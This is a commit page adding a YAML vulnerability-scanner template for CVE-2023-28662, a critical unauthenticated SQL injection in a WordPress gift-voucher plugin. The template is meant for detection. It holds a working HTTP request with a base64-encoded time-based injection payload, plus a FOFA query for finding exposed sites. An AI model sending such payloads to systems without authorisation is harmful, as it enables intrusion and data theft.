Create CVE-2023-28662.yaml

patch-1
xxcdd 2024-02-04 18:48:42 +08:00 committed by GitHub
parent 9a05a1bd16
commit 043ff9f7b5
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 39 additions and 0 deletions

View File

@ -0,0 +1,39 @@
id: CVE-2023-28662
info:
name: Gift Cards (Gift Vouchers and Packages) Unauthenticated SQL Injection
author: xxcdd
severity: critical
description: |
The Gift Cards (Gift Vouchers and Packages) WordPress Plugin, version <= 4.3.1, is affected by an unauthenticated SQL injection vulnerability in the template parameter in the wpgv_doajax_voucher_pdf_save_func action.
impact: |
Successful exploitation of this vulnerability could allow an attacker to perform SQL injection attacks, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
remediation: |
Update the Gift Cards (Gift Vouchers and Packages) WordPress Plugin to the latest version available.
reference:
- https://www.tenable.com/security/research/tra-2023-2
- https://wordpress.org/plugins/gift-voucher/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-28662
cwe-id: CWE-89
cpe: cpe:2.3:a:codemenschen:gift_vouchers:*:*:*:*:*:wordpress:*:*
metadata:
fofa-query: body="/wp-content/plugins/gift-voucher/"
tags: cve,cve2023,wordpress,wp,wp-plugin,sqli,unauth,gift-voucher
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Content-Length: {{Content-Length}}
action=wpgv_doajax_voucher_pdf_save_func&template=LTEgT1IgU0xFRVAoNik=
matchers:
- type: dsl
dsl:
- 'duration>=6'